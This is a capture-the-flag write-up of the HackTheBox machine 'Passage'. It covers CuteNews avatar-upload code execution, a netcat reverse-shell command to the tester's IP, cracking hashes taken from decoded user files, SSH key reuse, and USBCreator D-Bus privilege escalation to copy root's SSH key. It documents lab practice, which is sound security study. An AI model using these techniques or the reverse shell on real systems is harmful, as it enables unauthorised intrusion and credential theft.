HackTheBox Writeup — Passage
This is my writeup for the HackTheBox machine ‘Passage’, which runs a Linux OS and is one of the ‘Medium’ rated machines.
Summary
A web application supported by Fail2Ban means we have to do some manual enumeration, leading to us finding a CuteNews CMS v2.1.2 installation that is vulnerable to RCE via Image Upload. After getting a reverse shell we find some strange .PHP files that contains base64 encoded text. Decoding all of these with a python script reveals some hash values which once cracked lets us login as Paul as grab user.txt. We find that another user on the box ‘nadav’ uses Paul’s SSH key for remote access, so we use this to pivot to the ‘nadav’ user. Finally, to get root we exploit sud
1. Enumeration and Initial Foothold
I began my enumeration with an nmap scan.
# Nmap 7.80 scan as: nmap -sV -p- -T4 -oN scan 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.027s latency).
Not shown: 65533 closed portsPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Heading over to the web app, we can see some form of news/blog application. The most recent post states Fail2Ban has been implemented, which blocks IP addresses showing signs of malicious activity. This means we cannot brute-force directories/files.
Some manual enumeration shows that this application is powered by CuteNews PHP News Management System. This was shown at the bottom of the home page, and within some HTML source code links, where we also find two potential usernames and a hostname paul@passage.htb and nadav@passage.htb. A quick google search for the CuteNews login page tell’s us to append /CuteNews/ to the root of the URL and this works, along with getting the version number v2.1.2.
Unfortunately we don’t have any credentials, but we do have a version number so I searched ExploitDB and found two potential RCE exploits. One with Metasploit and another manual exploit , both exploiting an authenticated (even low privilege users) RCE vulnerability via the ‘avatar’ Image upload. Let’s do it manually.
First we register a user and download a random image of the Internet. Next, let’s use `exiftool` to embed a PHP shell command within the `dice.png` file.
Next we need to upload it as the avatar for our newly created low-privilege user on the CuteNews CMS.
Next, we need to intercept the request with BurpSuite and alter the filename from dice.png to dice.php and forward the request on to the web server.
Finally, once we access all the uploaded images and add ?cmd= to the end of the image, we get code execution!
Using a netcat reverse shell ( nc -e /bin/sh 10.10.14.58 7777 ) with a netcat listener open we get a shell on the box as `www-data`.
2. User Shell — Paul
Enumerating the web directory /var/www/html/CuteNews/cdata/users/ finds a number of strange php files, with all the content inside base64 encoded.
I put the contents of all these files into one text file, transferred this back to my machine and wrote a quick python3 to help sort the data. The script and explanation is below.
- open the text file in ‘read text’ mode;
- iterate over each line in the file and removing any data that was not a base64 encoded string;
- decode the base64 strings and look for data concerning the users identified earlier in the HTML source code;
- remove duplicates from the output and only output the content with hash values present.
#!/usr/bin/env python3
import base64 as b64inp_file = open('out.txt', 'rt')
unique = set()for lines in inp_file:
each_line = lines.replace("<?php die('Direct call - access denied'); ?>", "")if each_line.strip():
decoded = b64.b64decode(each_line)
if "paul@passage.htb" in str(decoded) or "nadav@passage.htb" in str(decoded):
unique.add(str(decoded))for item in unique:
if len(item) > 300:
print(item, "\n")inp_file.close()
Cool, looks like we have the password hashes for paul and nadav. Putting these into Crackstation identifies them as SHA265 hashes and cracks them easily.
Trying SSH didn’t work, but when we try logging in as Paul using su we get a shell and user.txt.
3. User Shell — Nadav
Performing some enumeration with Paul doesn’t look promising, so maybe we need to escalate to nadav. Luckily, nadav is defined in Paul’s SSH Public Key, meaning we can use Paul’s SSH Private Key to get a shell as nadav.
4. Root
Running LinPeas, we find that the box has ‘USBCreator’ installed and this has identified it as ‘vulnerable’. Following some further research we find that USBCreator’s D-Bus interface is vulnerable to local privilege escalation, providing the current user is in the sudoers group.
Let’s check that — (I forgot to screenshot, my bad) — a replicated output will have to do.
nadav@passage:-$ id
uid=1000(nadav) gid=1000(nadav), 4(adm), 24(cdrom), 27(sudo), etc...This vulnerability was released in June 2019 and there’s a really in-depth blog post about it here.
TL;DR on the vulnerability: I won’t repeat too much of the technical details from the post, but in short:- this vulnerability allows us to write-to/copy-data-from sensitive files on the filesystem due to a lack of password prompts with privileged actions (i.e. root privileges) and due to a lack of input sanitisation on user-controlled input, which gets directly passed to the unix tool dd.
This means we can use this to overwrite file such as /etc/shadow and change the root password, but since we’ve seen SSH is heavily used on this box lets copy root’s SSH private key into a file.
Proof of the copied SSH private key for root.
… And finally, the root shell via SSH and the root flag :)
Conclusion
Thanks for reading and keep an eye out for future writeups! Feedback is always welcome through, and my HackTheBox profile is linked below :)
